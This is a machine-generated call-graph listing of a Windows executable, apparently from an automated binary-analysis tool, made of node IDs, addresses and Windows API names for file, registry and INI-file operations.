EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97531->97540 97533->97524 97535 d6b412 97534->97535 97536 d6b40c 97534->97536 97535->97515 97536->97535 97537 d6be6d 8 API calls 97536->97537 97537->97535 97538->97531 97539->97531 97540->97531 97542 d73121 97541->97542 97545 d730fd 97541->97545 97910 d805d2 5 API calls __Init_thread_wait 97542->97910 97544 d72b60 97544->97375 97545->97544 97912 d805d2 5 API calls __Init_thread_wait 97545->97912 97546 d7312b 97546->97545 97911 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97546->97911 97548 d79ec7 97548->97544 97913 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97548->97913 97552 dd875a __wsopen_s 97551->97552 97914 d68e70 97552->97914 97555 dd8799 97557 d68e70 52 API calls 97555->97557 97570 dd8973 97555->97570 97558 dd887c 97557->97558 97937 d6557e 97558->97937 97562 dd88cd 97563 dd88f7 GetCurrentDirectoryW SetCurrentDirectoryW 97562->97563 97564 dd8921 97563->97564 97563->97570 97950 dce387 lstrlenW 97564->97950 97567 dce9c5 GetFileAttributesW 97568 dd8938 97567->97568 97569 dd8940 GetFileAttributesW SetFileAttributesW 97568->97569 97576 dd89cb 97568->97576 97571 dd8969 SetCurrentDirectoryW 97569->97571 97572 dd89b1 97569->97572 97570->97410 97571->97570 97573 dd89b5 SetCurrentDirectoryW 97572->97573 97574 dd8a02 SetCurrentDirectoryW 97572->97574 97573->97576 97574->97570 97955 dd9f9f FindFirstFileW 97576->97955 97577 dd89ea 97577->97574 97579 d6bf07 8 API calls 97578->97579 97580 decd39 97579->97580 97581 d6bf07 8 API calls 97580->97581 97582 decd42 97581->97582 97583 d6bf07 8 API calls 97582->97583 97584 decd4b 97583->97584 97585 d68e70 52 API calls 97584->97585 97594 decdda 97584->97594 97586 decd71 97585->97586 98021 ded6b1 97586->98021 97588 decda5 98047 ded2f7 97588->98047 97590 decdd6 97591 dece0f RegConnectRegistryW 97590->97591 97592 dece76 RegCreateKeyExW 97590->97592 97590->97594 97591->97592 97591->97594 97595 decf0e 97592->97595 97602 decead 97592->97602 97594->97410 97596 ded1d6 RegCloseKey 97595->97596 97596->97594 97602->97594 97605 deceff RegCloseKey 97602->97605 97605->97594 97669 dea607 97667->97669 97674 dea5c7 97667->97674 97668 dea625 97670 d6c92d 39 API calls 97668->97670 97672 dea682 97668->97672 97668->97674 97669->97668 97671 d6c92d 39 API calls 97669->97671 97670->97672 97671->97668 98089 dd0287 97672->98089 97674->97410 97676 d68e70 52 API calls 97675->97676 97677 deac65 97676->97677 97678 dcdc9c 46 API calls 97677->97678 97679 deac74 97678->97679 97679->97410 97681 d6b3fe 8 API calls 97680->97681 97682 ddde70 97681->97682 98147 dd183b 97682->98147 97684 ddde78 97684->97410 97686 d68e70 52 API calls 97685->97686 97687 dd65c7 97686->97687 97688 dce387 4 API calls 97687->97688 97689 dd65d1 97688->97689 97689->97410 97691 d6796c 97690->97691 97692 d6795d 97690->97692 97691->97692 97693 d67971 CloseHandle 97691->97693 97692->97410 97693->97692 97695 d68e70 52 API calls 97694->97695 97696 dd4ae8 97695->97696 98172 dcda81 97696->98172 97698 dd4af0 97698->97410 97700 d68e70 52 API calls 97699->97700 97701 dd6577 97700->97701 98184 dcdb69 97701->98184 97703 dd657f 97704 dd6583 GetLastError 97703->97704 97705 dd6598 97703->97705 97704->97705 97705->97410 97707 dce9d1 97706->97707 97707->97410 97711 dea4c7 97708->97711 97709 d68e70 52 API calls 97710 dea534 97709->97710 98296 dd17be 97710->98296 97711->97709 97713 dea4d6 97711->97713 97713->97410 97715 d6bf07 8 API calls 97714->97715 97716 deeb7a 97715->97716 97717 d68e70 52 API calls 97716->97717 97718 deeb89 97717->97718 98337 d67a14 97718->98337 97721 d68e70 52 API calls 97722 deeba9 97721->97722 97723 deec26 97722->97723 97724 deebc1 97722->97724 97726 d68e70 52 API calls 97723->97726 97725 d6c92d 39 API calls 97724->97725 97727 deebc6 97725->97727 97728 deec2b 97726->97728 97729 deec38 97727->97729 97732 deebdf 97727->97732 97728->97729 97730 deec73 97728->97730 98361 d66ab6 97729->98361 97733 deec8b 97730->97733 97735 d6c92d 39 API calls 97730->97735 97734 d68685 8 API calls 97732->97734 97738 d6c92d 39 API calls 97733->97738 97741 deeca4 97733->97741 97737 deebec 97734->97737 97735->97733 97736 d6be6d 8 API calls 97739 deecbe 97736->97739 97740 d67af4 8 API calls 97737->97740 97738->97741 98342 dc9b57 97739->98342 97743 deebfa 97740->97743 97741->97736 97744 d68685 8 API calls 97743->97744 97745 deec13 97744->97745 97746 d67af4 8 API calls 97745->97746 97748 deec21 97746->97748 98375 d67a59 97748->98375 97749 deec45 97749->97410 97751 d66ab6 8 API calls 97750->97751 97752 d7be8d 97751->97752 97754 d8016b 8 API calls 97752->97754 97756 db8f7a 97752->97756 97755 d7bea6 97754->97755 97757 d8019b 8 API calls 97755->97757 97798 d7bf1f 97756->97798 98440 dda607 39 API calls 97756->98440 97758 d7beb7 97757->97758 97759 d67953 CloseHandle 97758->97759 97760 d7bec2 97759->97760 97762 d6bf07 8 API calls 97760->97762 97761 d6c92d 39 API calls 97763 db8fdc 97761->97763 97764 d7beca 97762->97764 97765 d7bf2c 97763->97765 97766 db8fe4 97763->97766 97767 d67953 CloseHandle 97764->97767 98417 d7fdc9 97765->98417 97769 d6c92d 39 API calls 97766->97769 97770 d7bed1 97767->97770 97774 d7bf33 97769->97774 97771 d68e70 52 API calls 97770->97771 97772 d7bedd 97771->97772 97773 d67953 CloseHandle 97772->97773 97775 d7bee7 97773->97775 97776 db8ff9 97774->97776 97777 d7bf4e 97774->97777 98394 d66e52 97775->98394 97780 d8019b 8 API calls 97776->97780 97779 d67a14 8 API calls 97777->97779 97782 d7bf56 97779->97782 97783 db8ffe 97780->97783 98422 d7bfbc 97782->98422 97787 db9012 97783->97787 98441 d641c9 97783->98441 97784 d7bf00 98402 d66b12 97784->98402 97785 db8f72 98439 d67923 CloseHandle ISource 97785->98439 97788 dd1759 8 API calls 97787->97788 97792 db9016 __fread_nolock 97787->97792 97788->97792 97790 d7bf65 97790->97792 97793 d67a59 8 API calls 97790->97793 97796 d7bf79 97793->97796 97795 d7bf0e 98436 d66afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 97795->98436 97799 d7bfb3 97796->97799 97801 d67953 CloseHandle 97796->97801 97798->97761 97798->97765 97799->97410 97800 d7bf15 97800->97798 97803 db8f3b 97800->97803 97804 d7bfa7 97801->97804 98438 dcd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97803->98438 97804->97799 98437 d67923 CloseHandle ISource 97804->98437 97805 db8f52 97805->97798 97808 d6c92d 39 API calls 97807->97808 97809 d7f972 97808->97809 97810 dbfac0 Sleep 97809->97810 97811 d7f97a timeGetTime 97809->97811 97812 d6c92d 39 API calls 97811->97812 97813 d7f990 97812->97813 97813->97410 97815 d6bf07 8 API calls 97814->97815 97816 dd8e4a 97815->97816 97817 d8019b 8 API calls 97816->97817 97818 dd8e54 97817->97818 97819 d641a6 8 API calls 97818->97819 97820 dd8e5e 97819->97820 97821 d68e70 52 API calls 97820->97821 97822 dd8e6d 97821->97822 97823 d6557e 9 API calls 97822->97823 97824 dd8e78 97823->97824 97825 d68e70 52 API calls 97824->97825 97826 dd8e85 97825->97826 97827 d68e70 52 API calls 97826->97827 97828 dd8e97 97827->97828 97829 d68e70 52 API calls 97828->97829 97830 dd8eac GetPrivateProfileStringW 97829->97830 97831 d66ab6 8 API calls 97830->97831 97832 dd8ecf ISource 97831->97832 97832->97410 97834 d68e70 52 API calls 97833->97834 97835 dd6d47 97834->97835 97836 dd6d84 97835->97836 97837 d6c92d 39 API calls 97835->97837 98511 dce783 97836->98511 97839 dd6d76 97837->97839 97839->97836 97841 d6557e 9 API calls 97839->97841 97840 dd6d92 97843 d67a59 8 API calls 97840->97843 97841->97836 97845 dd6dd7 97843->97845 97844 d68e70 52 API calls 97844->97840 97845->97410 97847 dd5ef4 97846->97847 97874 dd5fbd 97846->97874 97848 d6c92d 39 API calls 97847->97848 97850 dd5eff 97848->97850 97849 d68e70 52 API calls 97851 dd5fef 97849->97851 97852 d6c92d 39 API calls 97850->97852 97854 d68e70 52 API calls 97851->97854 97853 dd5f15 97852->97853 97856 d6bf07 8 API calls 97853->97856 97853->97874 97855 dd6001 97854->97855 98516 dcd836 97855->98516 97858 dd5f26 97856->97858 97860 d6bf07 8 API calls 97858->97860 97859 dd6011 97859->97410 97861 dd5f2f 97860->97861 97862 d68e70 52 API calls 97861->97862 97863 dd5f3c 97862->97863 97864 d6694e 8 API calls 97863->97864 97865 dd5f4f 97864->97865 97866 d67af4 8 API calls 97865->97866 97867 dd5f60 97866->97867 97875 dd5f89 97867->97875 98559 dcdc8e 97867->98559 97869 d6c92d 39 API calls 97869->97874 97871 d6b25f 8 API calls 97872 dd5f80 97871->97872 97873 dcda81 12 API calls 97872->97873 97873->97875 97874->97849 97874->97859 97875->97869 97877 d6bf07 8 API calls 97876->97877 97878 dd9607 97877->97878 97879 d68e70 52 API calls 97878->97879 97880 dd9616 97879->97880 97881 d6557e 9 API calls 97880->97881 97882 dd9621 97881->97882 97883 d68e70 52 API calls 97882->97883 97884 dd962e 97883->97884 97885 d68e70 52 API calls 97884->97885 97886 dd9640 97885->97886 97887 d68e70 52 API calls 97886->97887 97888 dd9655 WritePrivateProfileStringW 97887->97888 97889 dd966b WritePrivateProfileStringW 97888->97889 97890 dd9677 97888->97890 97889->97890 97890->97410 98629 de88b6 97891->98629 97893 de9efa 97893->97410 97894->97369 97896 d6b26e _wcslen 97895->97896 97897 d8019b 8 API calls 97896->97897 97898 d6b296 __fread_nolock 97897->97898 97899 d8016b 8 API calls 97898->97899 97900 d6b2ac 97899->97900 97900->97382 97901->97373 97902->97397 97903->97401 97904->97372 97905->97408 97906->97408 97907->97408 97908->97404 97909->97408 97910->97546 97911->97545 97912->97548 97913->97544 97915 d68e85 97914->97915 97931 d68e82 97914->97931 97916 d68e8d 97915->97916 97917 d68ebb 97915->97917 97974 d85556 26 API calls 97916->97974 97919 d68ecd 97917->97919 97926 da6b10 97917->97926 97928 da6a29 97917->97928 97975 d7fe8f 51 API calls 97919->97975 97920 d68e9d 97925 d8016b 8 API calls 97920->97925 97923 da6b28 97923->97923 97927 d68ea7 97925->97927 97977 d85513 26 API calls 97926->97977 97929 d6b25f 8 API calls 97927->97929 97930 d8019b 8 API calls 97928->97930 97936 da6aa2 97928->97936 97929->97931 97933 da6a72 97930->97933 97931->97555 97969 d6c92d 97931->97969 97932 d8016b 8 API calls 97934 da6a99 97932->97934 97933->97932 97935 d6b25f 8 API calls 97934->97935 97935->97936 97976 d7fe8f 51 API calls 97936->97976 97978 da22f0 97937->97978 97940 d655c5 97984 d6bceb 97940->97984 97941 d655aa 97942 d684b7 8 API calls 97941->97942 97944 d655b6 97942->97944 97980 d679ed 97944->97980 97947 d8d913 97990 d8d6be 97947->97990 97951 dce3cf 97950->97951 97952 dce3a5 GetFileAttributesW 97950->97952 97951->97567 97951->97570 97952->97951 97953 dce3b1 FindFirstFileW 97952->97953 97953->97951 97954 dce3c2 FindClose 97953->97954 97954->97951 97956 dda03a FindClose 97955->97956 97960 dd9fc9 97955->97960 97957 dda04b FindFirstFileW 97956->97957 97958 dda0e2 97956->97958 97965 dda060 97957->97965 97967 dda0d9 FindClose 97957->97967 97958->97577 97959 dda028 FindNextFileW 97959->97956 97959->97960 97960->97959 97963 dd9ff7 GetFileAttributesW SetFileAttributesW 97960->97963 97962 dda0c7 FindNextFileW 97962->97965 97962->97967 97963->97960 97964 dda0eb FindClose 97963->97964 97964->97958 97965->97962 97966 dda0a0 SetCurrentDirectoryW 97965->97966 97965->97967 97968 dda0c0 SetCurrentDirectoryW 97965->97968 97966->97965 97967->97958 97968->97962 97970 d6c93e 97969->97970 97971 d6c945 97969->97971 97970->97971 98020 d86661 39 API calls _strftime 97970->98020 97971->97555 97973 d6c988 97973->97555 97974->97920 97975->97920 97976->97926 97977->97923 97979 d6558b GetFullPathNameW 97978->97979 97979->97940 97979->97941 97981 d679fb 97980->97981 97982 d696d9 8 API calls 97981->97982 97983 d655c2 97982->97983 97983->97947 97985 d6bd05 97984->97985 97986 d6bcf8 97984->97986 97987 d8016b 8 API calls 97985->97987 97986->97944 97988 d6bd0f 97987->97988 97989 d8019b 8 API calls 97988->97989 97989->97986 97991 d8d89f 97990->97991 97992 d8d6d5 97990->97992 98018 d8f669 20 API calls __dosmaperr 97991->98018 97992->97991 97996 d8d740 97992->97996 97994 d8d8af 98019 d92b7c 26 API calls ___std_exception_copy 97994->98019 97997 d8d764 97996->97997 98008 d8d78b 97996->98008 98013 d95153 26 API calls 2 library calls 97996->98013 98012 d8f669 20 API calls __dosmaperr 97997->98012 97999 d8d868 97999->97997 98002 d8d87b 97999->98002 98004 d8d774 97999->98004 98000 d8d820 98000->97997 98003 d8d841 98000->98003 98015 d95153 26 API calls 2 library calls 98000->98015 98017 d95153 26 API calls 2 library calls 98002->98017 98003->97997 98003->98004 98007 d8d857 98003->98007 98004->97562 98016 d95153 26 API calls 2 library calls 98007->98016 98008->97997 98011 d8d7fd 98008->98011 98014 d95153 26 API calls 2 library calls 98008->98014 98011->97999 98011->98000 98012->98004 98013->98008 98014->98011 98015->98003 98016->98004 98017->98004 98018->97994 98019->98004 98020->97973 98022 d6bceb 8 API calls 98021->98022 98023 ded6bf 98022->98023 98024 d6bceb 8 API calls 98023->98024 98025 ded6c7 98024->98025 98026 d6bceb 8 API calls 98025->98026 98027 ded6cf 98026->98027 98028 ded737 98027->98028 98082 d6627c 98027->98082 98030 d6bceb 8 API calls 98028->98030 98034 ded735 98030->98034 98032 d6627c 8 API calls 98033 ded6f7 98032->98033 98033->98028 98036 ded6fc 98033->98036 98069 d68685 98034->98069 98037 d696d9 8 API calls 98036->98037 98042 ded707 98037->98042 98038 ded760 98039 d68685 8 API calls 98038->98039 98040 ded777 98039->98040 98041 d679ed 8 API calls 98040->98041 98043 ded780 98041->98043 98044 d68685 8 API calls 98042->98044 98043->97588 98045 ded728 98044->98045 98046 d696d9 8 API calls 98045->98046 98046->98034 98048 d6c269 8 API calls 98047->98048 98049 ded30e CharUpperBuffW 98048->98049 98050 ded329 98049->98050 98051 d6bf07 8 API calls 98050->98051 98052 ded334 98051->98052 98053 d68685 8 API calls 98052->98053 98054 ded347 _wcslen 98053->98054 98055 d679ed 8 API calls 98054->98055 98056 ded3a4 _wcslen 98054->98056 98055->98056 98056->97590 98070 d68694 98069->98070 98071 d686f1 98069->98071 98070->98071 98073 d6869f 98070->98073 98072 d696d9 8 API calls 98071->98072 98079 d686c2 __fread_nolock 98072->98079 98074 d686ba 98073->98074 98075 da66b7 98073->98075 98085 d68894 8 API calls 98074->98085 98076 d8016b 8 API calls 98075->98076 98078 da66c1 98076->98078 98080 d8019b 8 API calls 98078->98080 98079->98038 98081 da66f4 98080->98081 98083 d6c269 8 API calls 98082->98083 98084 d66287 98083->98084 98084->98028 98084->98032 98085->98079 98121 dd01bf 98089->98121 98092 dd0308 98137 dd04fe 56 API calls __fread_nolock 98092->98137 98094 dd0320 98095 dd0386 98094->98095 98096 dd0330 98094->98096 98097 dd041c 98095->98097 98098 dd03b6 98095->98098 98114 dd02ae __fread_nolock 98095->98114 98101 dd0368 98096->98101 98138 dd276a 10 API calls 98096->98138 98099 dd04c5 98097->98099 98100 dd0425 98097->98100 98102 dd03bb 98098->98102 98103 dd03e6 98098->98103 98099->98114 98146 d6c5df 39 API calls 98099->98146 98104 dd042a 98100->98104 98105 dd04a2 98100->98105 98128 dd1759 98101->98128 98102->98114 98141 d6c9fb 39 API calls 98102->98141 98103->98114 98142 d6c9fb 39 API calls 98103->98142 98109 dd0469 98104->98109 98110 dd0430 98104->98110 98105->98114 98145 d6c5df 39 API calls 98105->98145 98109->98114 98144 d6c5df 39 API calls 98109->98144 98110->98114 98143 d6c5df 39 API calls 98110->98143 98114->97674 98116 dd033c 98139 dd276a 10 API calls 98116->98139 98119 dd0353 __fread_nolock 98140 dd276a 10 API calls 98119->98140 98122 dd020c 98121->98122 98126 dd01d0 98121->98126 98124 d6c92d 39 API calls 98122->98124 98123 dd020a 98123->98092 98123->98094 98123->98114 98124->98123 98125 d68e70 52 API calls 98125->98126 98126->98123 98126->98125 98127 d84db8 _strftime 40 API calls 98126->98127 98127->98126 98129 dd1764 98128->98129 98130 d8016b 8 API calls 98129->98130 98131 dd176b 98130->98131 98132 dd1798 98131->98132 98133 dd1777 98131->98133 98134 d8019b 8 API calls 98132->98134 98135 d8019b 8 API calls 98133->98135 98136 dd1780 ___scrt_fastfail 98134->98136 98135->98136 98136->98114 98137->98114 98138->98116 98139->98119 98140->98101 98141->98114 98142->98114 98143->98114 98144->98114 98145->98114 98146->98114 98148 dd1852 98147->98148 98162 dd196b 98147->98162 98149 dd1872 98148->98149 98150 dd189f 98148->98150 98153 dd18b6 98148->98153 98149->98150 98155 dd1886 98149->98155 98151 d8019b 8 API calls 98150->98151 98152 dd1894 __fread_nolock 98151->98152 98159 d8016b 8 API calls 98152->98159 98154 d8019b 8 API calls 98153->98154 98165 dd18d3 98153->98165 98154->98165 98157 d8019b 8 API calls 98155->98157 98156 dd18fa 98158 d8019b 8 API calls 98156->98158 98157->98152 98160 dd1900 98158->98160 98159->98162 98166 d7c1f1 98160->98166 98162->97684 98165->98152 98165->98155 98165->98156 98167 d8019b 8 API calls 98166->98167 98168 d7c208 98167->98168 98169 d8016b 8 API calls 98168->98169 98170 d7c214 98169->98170 98171 d7f9e2 10 API calls 98170->98171 98171->98152 98173 d679ed 8 API calls 98172->98173 98174 dcdab6 GetFileAttributesW 98173->98174 98175 dcdaca GetLastError 98174->98175 98178 dcdae3 98174->98178 98176 dcdad7 CreateDirectoryW 98175->98176 98177 dcdae5 98175->98177 98176->98177 98176->98178 98177->98178 98179 d696d9 8 API calls 98177->98179 98178->97698 98180 dcdb27 98179->98180 98181 dcda81 8 API calls 98180->98181 98182 dcdb30 98181->98182 98182->98178 98183 dcdb34 CreateDirectoryW 98182->98183 98183->98178 98185 d6bf07 8 API calls 98184->98185 98186 dcdb88 98185->98186 98187 d6bf07 8 API calls 98186->98187 98188 dcdb91 98187->98188 98189 d6bf07 8 API calls 98188->98189 98190 dcdb9a 98189->98190 98191 d6557e 9 API calls 98190->98191 98192 dcdba5 98191->98192 98193 dce9c5 GetFileAttributesW 98192->98193 98194 dcdbae 98193->98194 98195 dcdbc0 98194->98195 98197 d665a4 8 API calls 98194->98197 98209 d6694e 98195->98209 98197->98195 98198 dcdbd4 FindFirstFileW 98199 dcdc60 FindClose 98198->98199 98205 dcdbf3 98198->98205 98200 dcdc6b 98199->98200 98200->97703 98201 dcdc3b FindNextFileW 98203 dcdc4f 98201->98203 98201->98205 98202 d6be6d 8 API calls 98202->98205 98203->98205 98205->98199 98205->98201 98205->98202 98251 d67af4 98205->98251 98260 d665a4 98205->98260 98210 d6bf07 8 API calls 98209->98210 98211 d66964 98210->98211 98212 d6bf07 8 API calls 98211->98212 98213 d6696c 98212->98213 98214 d6bf07 8 API calls 98213->98214 98215 d66974 98214->98215 98216 d6bf07 8 API calls 98215->98216 98217 d6697c 98216->98217 98218 d669b0 98217->98218 98219 da5725 98217->98219 98221 d68685 8 API calls 98218->98221 98220 d6be6d 8 API calls 98219->98220 98222 da572e 98220->98222 98223 d669be 98221->98223 98224 d6bceb 8 API calls 98222->98224 98225 d696d9 8 API calls 98223->98225 98227 d669f3 98224->98227 98226 d669c8 98225->98226 98226->98227 98228 d68685 8 API calls 98226->98228 98229 d66a38 98227->98229 98230 d66a14 98227->98230 98246 da5750 98227->98246 98232 d669e9 98228->98232 98231 d68685 8 API calls 98229->98231 98230->98229 98235 d6627c 8 API calls 98230->98235 98233 d66a49 98231->98233 98234 d696d9 8 API calls 98232->98234 98236 d66a5f 98233->98236 98241 d6be6d 8 API calls 98233->98241 98234->98227 98238 d66a21 98235->98238 98237 d66a73 98236->98237 98242 d6be6d 8 API calls 98236->98242 98240 d66a7e 98237->98240 98244 d6be6d 8 API calls 98237->98244 98238->98229 98243 d68685 8 API calls 98238->98243 98239 d684b7 8 API calls 98248 da5810 98239->98248 98245 d6be6d 8 API calls 98240->98245 98250 d66a89 98240->98250 98241->98236 98242->98237 98243->98229 98244->98240 98245->98250 98246->98239 98247 d6627c 8 API calls 98247->98248 98248->98229 98248->98247 98269 d6acc0 8 API calls __fread_nolock 98248->98269 98250->98198 98252 d67b06 98251->98252 98253 da63b3 98251->98253 98270 d67b17 98252->98270 98280 d6662b 8 API calls __fread_nolock 98253->98280 98256 da63bd 98261 da5629 98260->98261 98262 d665bb 98260->98262 98264 d8016b 8 API calls 98261->98264 98286 d665cc 98262->98286 98266 da5633 _wcslen 98264->98266 98269->98248 98280->98256 98297 dd17cb 98296->98297 98298 d8016b 8 API calls 98297->98298 98299 dd17d2 98298->98299 98302 dcfbca 98299->98302 98301 dd180c 98301->97713 98303 d6c269 8 API calls 98302->98303 98304 dcfbdd CharLowerBuffW 98303->98304 98305 dcfbf0 98304->98305 98306 dcfc2e 98305->98306 98307 d6627c 8 API calls 98305->98307 98319 dcfbfa ___scrt_fastfail 98305->98319 98308 dcfc40 98306->98308 98310 d6627c 8 API calls 98306->98310 98307->98305 98309 d8019b 8 API calls 98308->98309 98313 dcfc6e 98309->98313 98310->98308 98315 dcfc90 98313->98315 98335 dcfb02 8 API calls 98313->98335 98314 dcfccd 98316 d8016b 8 API calls 98314->98316 98314->98319 98320 dcfd21 98315->98320 98317 dcfce7 98316->98317 98318 d8019b 8 API calls 98317->98318 98318->98319 98319->98301 98321 d6bf07 8 API calls 98320->98321 98322 dcfd53 98321->98322 98323 d6bf07 8 API calls 98322->98323 98324 dcfd5c 98323->98324 98325 d6bf07 8 API calls 98324->98325 98333 dcfd65 98325->98333 98326 d684b7 8 API calls 98326->98333 98327 dd0029 98327->98314 98328 d6acc0 8 API calls 98328->98333 98329 d86718 GetStringTypeW 98329->98333 98331 d86661 39 API calls 98331->98333 98332 dcfd21 40 API calls 98332->98333 98333->98326 98333->98327 98333->98328 98333->98329 98333->98331 98333->98332 98334 d6be6d 8 API calls 98333->98334 98336 d86742 GetStringTypeW _strftime 98333->98336 98334->98333 98335->98313 98336->98333 98338 d8019b 8 API calls 98337->98338 98339 d67a39 98338->98339 98340 d8016b 8 API calls 98339->98340 98341 d67a47 98340->98341 98341->97721 98343 d6bf07 8 API calls 98342->98343 98344 dc9b6d 98343->98344 98345 d67a14 8 API calls 98344->98345 98346 dc9b81 98345->98346 98347 dc96e3 41 API calls 98346->98347 98352 dc9ba3 98346->98352 98348 dc9b9d 98347->98348 98350 d68685 8 API calls 98348->98350 98348->98352 98350->98352 98351 d68685 8 API calls 98351->98352 98352->98351 98353 dc9c42 98352->98353 98354 d67af4 8 API calls 98352->98354 98356 dc9c26 98352->98356 98381 dc96e3 98352->98381 98355 d6be6d 8 API calls 98353->98355 98357 dc9c51 98353->98357 98354->98352 98355->98357 98358 d68685 8 API calls 98356->98358 98357->97748 98359 dc9c36 98358->98359 98360 d67af4 8 API calls 98359->98360 98360->98353 98362 d66ac6 98361->98362 98363 da587b 98361->98363 98368 d8016b 8 API calls 98362->98368 98364 da588c 98363->98364 98365 d684b7 8 API calls 98363->98365 98366 d6bceb 8 API calls 98364->98366 98365->98364 98367 da5896 98366->98367 98367->98367 98369 d66ad9 98368->98369 98370 d66af4 98369->98370 98371 d66ae2 98369->98371 98373 d6bf07 8 API calls 98370->98373 98372 d6b25f 8 API calls 98371->98372 98374 d66aea 98372->98374 98373->98374 98374->97749 98376 d67a9e 98375->98376 98377 d67a65 98375->98377 98378 d67a78 98376->98378 98379 d6be6d 8 API calls 98376->98379 98380 d8016b 8 API calls 98377->98380 98378->97749 98379->98378 98380->98378 98382 dc9703 _wcslen 98381->98382 98383 dc97f2 98382->98383 98385 dc97f7 98382->98385 98386 dc9738 98382->98386 98383->98352 98385->98383 98387 d7e2e5 41 API calls 98385->98387 98386->98383 98388 d7e2e5 98386->98388 98387->98385 98389 d7e2f4 CompareStringW 98388->98389 98390 dbe463 98388->98390 98392 d7e319 98389->98392 98390->98392 98393 d8e24b 40 API calls 98390->98393 98392->98386 98393->98390 98395 da5985 98394->98395 98396 d66e69 CreateFileW 98394->98396 98397 d66e88 98395->98397 98398 da598b CreateFileW 98395->98398 98396->98397 98397->97784 98397->97785 98398->98397 98399 da59b3 98398->98399 98444 d66bfa 98399->98444 98403 d66b27 98402->98403 98414 d66b24 ISource 98402->98414 98404 d66bfa 3 API calls 98403->98404 98403->98414 98405 d66b44 98404->98405 98406 da589b 98405->98406 98407 d66b51 98405->98407 98409 d7fdc9 3 API calls 98406->98409 98408 d8019b 8 API calls 98407->98408 98410 d66b5d 98408->98410 98409->98414 98450 d641a6 98410->98450 98414->97795 98416 d66bfa 3 API calls 98416->98414 98418 d66bfa 3 API calls 98417->98418 98419 d7fde7 98418->98419 98420 d66bfa 3 API calls 98419->98420 98421 d7fe08 98420->98421 98421->97774 98423 d7bfc7 98422->98423 98424 d7c003 98422->98424 98423->98424 98426 d7bfd6 98423->98426 98425 d6bceb 8 API calls 98424->98425 98434 dcd2ab 98425->98434 98428 d7bfeb 98426->98428 98431 d7bff8 98426->98431 98427 dcd2da 98427->97790 98460 d7c009 98428->98460 98467 dcd3b2 12 API calls 98431->98467 98432 d7bff4 98432->97790 98434->98427 98468 dcd249 98434->98468 98475 d6acc0 8 API calls __fread_nolock 98434->98475 98436->97800 98437->97799 98438->97805 98439->97756 98440->97756 98442 d6b050 2 API calls 98441->98442 98443 d641da 98442->98443 98443->97787 98445 d66c11 98444->98445 98446 da58ec SetFilePointerEx 98445->98446 98447 d66c98 SetFilePointerEx SetFilePointerEx 98445->98447 98448 da58db 98445->98448 98449 d66c64 98445->98449 98447->98449 98448->98446 98449->98397 98451 d8016b 8 API calls 98450->98451 98452 d641b8 98451->98452 98453 d6b050 98452->98453 98454 d6b0cb 98453->98454 98455 d6b05e 98453->98455 98459 d7f13c SetFilePointerEx 98454->98459 98456 d66b73 98455->98456 98458 d6b09c ReadFile 98455->98458 98456->98416 98458->98455 98458->98456 98459->98455 98461 d7c1f1 8 API calls 98460->98461 98462 d7c021 98461->98462 98476 d6adc1 98462->98476 98466 d7c03c 98466->98432 98467->98432 98469 dcd26a 98468->98469 98470 dcd253 98468->98470 98471 d6b050 2 API calls 98469->98471 98470->98469 98472 dcd259 98470->98472 98474 dcd263 98471->98474 98473 d6b050 2 API calls 98472->98473 98473->98474 98474->98434 98475->98434 98490 d7feaa 98476->98490 98478 d6ae07 98478->98466 98482 d68774 MultiByteToWideChar 98478->98482 98479 d6b050 2 API calls 98480 d6add2 98479->98480 98480->98478 98480->98479 98497 d6b0e3 8 API calls __fread_nolock 98480->98497 98483 d687e7 98482->98483 98484 d687a0 98482->98484 98486 d6bceb 8 API calls 98483->98486 98485 d8019b 8 API calls 98484->98485 98487 d687b5 MultiByteToWideChar 98485->98487 98489 d687db 98486->98489 98498 d687f0 98487->98498 98489->98466 98491 dbfe13 98490->98491 98492 d7febb 98490->98492 98493 d8016b 8 API calls 98491->98493 98492->98480 98494 dbfe1d 98493->98494 98495 d8019b 8 API calls 98494->98495 98496 dbfe32 98495->98496 98497->98480 98499 d68884 98498->98499 98500 d68803 98498->98500 98501 d696d9 8 API calls 98499->98501 98500->98499 98503 d6880f 98500->98503 98502 d68821 __fread_nolock 98501->98502 98502->98489 98504 d68847 98503->98504 98505 d68819 98503->98505 98506 d8016b 8 API calls 98504->98506 98510 d68894 8 API calls 98505->98510 98508 d68851 98506->98508 98509 d8019b 8 API calls 98508->98509 98509->98502 98510->98502 98512 da22f0 __wsopen_s 98511->98512 98513 dce790 GetShortPathNameW 98512->98513 98514 d684b7 8 API calls 98513->98514 98515 dce7b8 98514->98515 98515->97840 98515->97844 98517 d6bf07 8 API calls 98516->98517 98518 dcd853 98517->98518 98519 d6bf07 8 API calls 98518->98519 98520 dcd85b 98519->98520 98521 d6bf07 8 API calls 98520->98521 98522 dcd863 98521->98522 98523 d6557e 9 API calls 98522->98523 98524 dcd86d 98523->98524 98525 d6557e 9 API calls 98524->98525 98526 dcd877 98525->98526 98562 dce958 98526->98562 98528 dcd882 98529 dce9c5 GetFileAttributesW 98528->98529 98530 dcd88d 98529->98530 98531 dcd89f 98530->98531 98532 d665a4 8 API calls 98530->98532 98533 dce9c5 GetFileAttributesW 98531->98533 98532->98531 98534 dcd8a7 98533->98534 98535 dcd8b4 98534->98535 98536 d665a4 8 API calls 98534->98536 98537 d6bf07 8 API calls 98535->98537 98536->98535 98538 dcd8bc 98537->98538 98539 d6bf07 8 API calls 98538->98539 98540 dcd8c4 98539->98540 98541 d6694e 8 API calls 98540->98541 98542 dcd8d5 FindFirstFileW 98541->98542 98560 dce387 4 API calls 98559->98560 98561 dcdc95 98560->98561 98561->97871 98561->97875 98563 d6bf07 8 API calls 98562->98563 98564 dce96d 98563->98564 98565 d6bf07 8 API calls 98564->98565 98566 dce975 98565->98566 98567 d6694e 8 API calls 98566->98567 98568 dce984 98567->98568 98569 d6694e 8 API calls 98568->98569 98570 dce994 98569->98570 98571 d7e2e5 41 API calls 98570->98571 98572 dce9a9 98571->98572 98572->98528 98630 d68e70 52 API calls 98629->98630 98631 de88ed 98630->98631 98655 de8932 ISource 98631->98655 98667 de9632 98631->98667 98633 de8bde 98634 de8dac 98633->98634 98638 de8bec 98633->98638 98734 de9843 59 API calls 98634->98734 98637 de8dbb 98637->98638 98639 de8dc7 98637->98639 98680 de87e3 98638->98680 98639->98655 98640 d68e70 52 API calls 98658 de89a6 98640->98658 